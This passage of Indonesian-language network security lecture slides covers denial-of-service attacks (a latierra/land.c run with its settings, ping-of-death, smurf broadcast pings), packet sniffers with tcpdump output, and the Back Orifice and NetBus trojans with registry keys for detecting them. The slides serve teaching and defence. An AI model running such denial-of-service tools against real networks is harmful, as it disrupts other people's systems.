  • 14. unix# ./latierra -i (-b) Beginning Port #: 192.167.1.1 -b 139 - 139 e 141 (-e) Ending Port # : 141 latierra v1.0b by (-s) Seconds to Pause: 1 MondoMan (-l) Loop : 1 (elmondo@usa.net), (-w) Window size : KeG 65000 Enhanced version of (-q) Sequence Number land.c originally : F1C (3868) developed by m3lt, FLC (-v) Time-to-Live : 255 Settings: (-p) IP Protocol # : 6 (-i) Dest. IP Addr : (-t) TCP flags : syn push 192.168.1.1 Done.
  • 15.  Ping-o-death Ping-o-death sebetulnya adalah eksploitasi program ping dengan memberikan packet yang ukurannya besar ke sistem yang dituju. Beberapa sistem UNIX ternyata menjadi hang ketika diserang dengan cara ini. Program ping umum terdapat di berbagai operating system, meskipun umumnya program ping tersebut mengirimkan packet dengan ukuran kecil (tertentu) dan tidak memiliki fasilitas untuk mengubah besarnya packet.  Ping broadcast (smurf)
  • 16.  Ping broadcast (smurf) Salah satu mekanisme serangan yang baru-baru ini mulai marak digunakan adalah menggunakan ping ke alamat broadcast, ini yang sering disebut dengan smurf. Seluruh komputer (device) yang berada di alamat broadcast tersebut akan menjawab Jika sebuah sistem memiliki banyak komputer (device) dan ping broadcast ini dilakukan terus menerus, jaringan dapat dipenuhi oleh respon-respon dari device-device tersebut. Akibatnya jaringan menjadi lambat.
  • 17. $ ping 192.168.1.255 PING 192.168.1.255 (192.168.1.255): 56 data bytes 64 bytes from 192.168.1.4: icmp_seq=0 ttl=64 time=2.6 ms 64 bytes from 192.168.1.2: icmp_seq=0 ttl=255 time=24.0 ms (DUP!) 64 bytes from 192.168.1.4: icmp_seq=1 ttl=64 time=2.5 ms 64 bytes from 192.168.1.2: icmp_seq=1 ttl=255 time=4.7 ms (DUP!) 64 bytes from 192.168.1.4: icmp_seq=2 ttl=64 time=2.5 ms 64 bytes from 192.168.1.2: icmp_seq=2 ttl=255 time=4.7 ms (DUP!) 64 bytes from 192.168.1.4: icmp_seq=3 ttl=64 time=2.5 ms 64 bytes from 192.168.1.2: icmp_seq=3 ttl=255 time=4.7 ms (DUP!) --- 192.168.1.255 ping statistics --- 4 packets transmitted, 4 packets received, +4 duplicates, 0% packet loss round-trip min/avg/max = 2.5/6.0/24.0 ms
  • 18. Program sniffer adalah program yang dapat digunakan untuk menyadap data dan informasi melalui jaringan komputer. Di tangan seorang admin, program sniffer sangat bermanfaat untuk mencari (debug) kesalahan di jaringan atau untuk memantau adanya serangan.
  • 19.  Sniffit Program sniffit dijalankan dengan userid root (atau program dapat di-setuid root sehingga dapat dijalankan oleh siapa saja) dan dapat menyadap data.  Tcpdump Program tcpdump merupakan program gratis yang umum digunakan untuk menangkap paket di sistem UNIX. Implementasi untuk sistem Window juga tersedia dengan nama windump.
  • 20. unix# tcpdump 06:46:39.028893 192.168.1.7 > 192.168.1.1: icmp: echo request 06:46:31.318893 192.168.1.7.1043 > 192.168.1.1.80: S 06:46:39.028893 192.168.1.1 > 192.168.1.7: icmp: echo reply 616175183:616175183(0) win 5840 <mss 1460,nop,nop,sackOK> (DF) 06:46:40.028893 192.168.1.7 > 192.168.1.1: icmp: echo request 06:46:31.318893 192.168.1.1.80 > 192.168.1.7.1043: S 06:46:40.028893 192.168.1.1 > 192.168.1.7: icmp: echo reply 1312015909:1312015909(0) ack 616175184 win 32736 <mss 1460> 06:46:41.028893 192.168.1.7 > 192.168.1.1: icmp: echo request 06:46:31.318893 192.168.1.7.1043 > 192.168.1.1.80: . ack 1 win 06:46:41.028893 192.168.1.1 > 192.168.1.7: icmp: echo reply 5840 (DF) 06:46:42.038893 192.168.1.7 > 192.168.1.1: icmp: 06:46:31.318893 192.168.1.7.1043 > echo request 192.168.1.1.80: P 06:46:42.038893 192.168.1.1 > 192.168.1.7: icmp: 1:296(295) ack 1 win 5840 (DF) echo reply 06:46:31.338893 192.168.1.1.80 > 06:46:44.048893 192.168.1.7.1043 > 192.168.1.7.1043: . ack 296 192.168.1.1.80: P win 32441 (DF) 296:591(295) ack 200 win 5641 (DF) 06:46:31.738893 192.168.1.1.80 > 06:46:44.048893 192.168.1.1.80 > 192.168.1.7.1043: P 192.168.1.7.1043: P 1:200(199) ack 296 win 32736 (DF) 200:398(198) ack 591 win 32736 (DF) 06:46:31.868893 192.168.1.7.1043 > 06:46:44.168893 192.168.1.7.1043 > 192.168.1.1.80: . ack 200 192.168.1.1.80: . ack 398 win 5641 (DF) win 5443 (DF) 06:46:31.898893 192.168.1.1.1492 > 192.168.1.7.113: S 2035772989:2035772989(0) win 512 <mss 1460> 06:46:31.898893 192.168.1.7.113 > 192.168.1.1.1492: R 0:0(0) ack 2035772990 win 0
  • 21.  Sniffer Pro Sniffer Pro merupakan program sniffer komersial yang berjalan di sistem Windows. Program ini dibuat oleh Network Associates dan cukup lengkap fasilitasnya. Sniffer Pro dapat menangkap packet dengan aturan-aturan (rules) tertentu. Bahkan dia dilengkapi dengan visualisasi yang sangat menarik dan membantu administrator.  Anti Sniffer Untuk menutup lubang keamanan dari kegiatan sniffing, administrator dapat membuat jaringannya bersegmen dan menggunakan perangkat switch sebagai pengganti hub biasa. Selain itu dapat juga digunakan program untuk mendeteksi adanya penggunaan sniffer di jaringan yang dikelolanya. Program pendeteksi sniffer ini disebut anti-sniffer.
  • 22. Trojan horse di sistem komputer adalah program yang disisipkan tanpa pengetahuan si pemilik komputer. Trojan horse ini kemudian dapat diaktifkan dan dikendalikan dari jarak jauh, atau dengan menggunakan timer (pewaktu). Akibatnya, komputer yang disisipi trojan horse tersebut dapat dikendalikan dari jarak jauh.  Back Orifice (BO)  Mendeteksi BO  NetBus
  • 23. Back Orifice (BO) merupakan trojan horse untuk sistem yang menggunakan operating system Windows (95, 98, NT, 2000). BO Merupakan produk dari Cult of the Dead Cow, pertama kali dikeluarkan 3 Agustus 1998 dan sangat populer di kalangan bawah tanah. Pada saat dokumen ini ditulis, telah keluar BO 2000 untuk sistem operasi Windows 2000
  • 24.  Mendeteksi BO Gunakan program "REGEDIT" dan cari HKEY_LOCAL_MACHINESOFTWAREMicrosoft WindowsCurrentVersionRunServices Sumber informasi tentang BO dapat diperoleh dari •http://www.nwi.net/~pchelp/bo/bo.html •http://www.bo2k.com •http://www.iss.net/xforce/alerts/advise5.html
  • 25.  NetBus NetBus merupakan trojan horse yang mirip Back Orifice. NetBus dapat digunakan untuk mengelola komputer Windows 95/98/NT dari jarak jauh untuk mengakses data dan fungsi dari komputer tersebut. HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun Informasi mengenai NetBus dapat diperoleh di http://www.netbus.org
  • 26. Metodologi dari penyusup “Hacking Exposed”  Target acquisition and information gaterhing  Initial access  Privilege escalation  Covering tracks